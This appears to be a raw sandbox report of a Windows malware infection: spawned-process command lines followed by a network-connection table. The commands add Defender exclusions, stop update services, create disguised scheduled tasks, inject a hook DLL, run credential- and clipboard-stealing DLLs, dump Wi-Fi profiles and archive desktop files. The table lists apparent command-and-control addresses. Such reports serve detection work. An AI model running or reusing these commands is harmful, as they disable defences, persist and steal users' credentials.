"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\EAC5.exe
C:\Users\Admin\AppData\Local\Temp\EAC5.exe
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Users\Admin\AppData\Local\Temp\EE11.exe
C:\Users\Admin\AppData\Local\Temp\EE11.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff1b6346f8,0x7fff1b634708,0x7fff1b634718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff1b6346f8,0x7fff1b634708,0x7fff1b634718
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Users\Admin\AppData\Local\Temp\FE8D.exe
C:\Users\Admin\AppData\Local\Temp\FE8D.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\610.exe
C:\Users\Admin\AppData\Local\Temp\610.exe
C:\Users\Admin\AppData\Local\Temp\AC4.exe
C:\Users\Admin\AppData\Local\Temp\AC4.exe
C:\Users\Admin\AppData\Local\Temp\1005.exe
C:\Users\Admin\AppData\Local\Temp\1005.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff1b6346f8,0x7fff1b634708,0x7fff1b634718
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5304 -ip 5304
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\1574.exe
C:\Users\Admin\AppData\Local\Temp\1574.exe
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 784
C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp" /SL5="$1028A,2998240,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe
"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -i
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "LAC1031-1"
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe
"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -s
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "Admin:N"&&CACLS "..\ea7c8244c8" /P "Admin:R" /E&&Exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff1b6346f8,0x7fff1b634708,0x7fff1b634718
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:N"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7128 -ip 7128
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff1b6346f8,0x7fff1b634708,0x7fff1b634718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 572
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7012 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7220 /prefetch:1
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\ea7c8244c8" /P "Admin:N"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll, Main
C:\Windows\SysWOW64\cacls.exe
CACLS "..\ea7c8244c8" /P "Admin:R" /E
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7656 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7176 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2c8 0x320
C:\Windows\system32\tar.exe
tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\771604342093_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8696 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8676 /prefetch:1
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9152 /prefetch:1
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6824 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6824 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
| RU | 193.233.255.73:80 | 193.233.255.73 | tcp |
| FI | 77.91.68.249:80 | 77.91.68.249 | tcp |
| US | 8.8.8.8:53 | 73.255.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.68.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.68.91.77.in-addr.arpa | udp |
| NL | 194.169.175.118:80 | 194.169.175.118 | tcp |
| US | 8.8.8.8:53 | 118.175.169.194.in-addr.arpa | udp |
| RU | 5.42.65.80:80 | 5.42.65.80 | tcp |
| US | 8.8.8.8:53 | 80.65.42.5.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | tcp | |
| FI | 77.91.124.86:19084 | tcp | |
| FI | 77.91.124.1:80 | 77.91.124.1 | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 1.124.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.43.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store.steampowered.com | udp |
| NL | 104.85.0.101:443 | store.steampowered.com | tcp |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
| US | 8.8.8.8:53 | 101.0.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store.akamai.steamstatic.com | udp |
| NL | 23.72.252.171:443 | store.akamai.steamstatic.com | tcp |
| NL | 23.72.252.171:443 | store.akamai.steamstatic.com | tcp |
| NL | 23.72.252.171:443 | store.akamai.steamstatic.com | tcp |
| NL | 23.72.252.171:443 | store.akamai.steamstatic.com | tcp |
| NL | 23.72.252.171:443 | store.akamai.steamstatic.com | tcp |
| NL | 23.72.252.171:443 | store.akamai.steamstatic.com | tcp |
| FI | 77.91.124.71:4341 | tcp | |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| IE | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
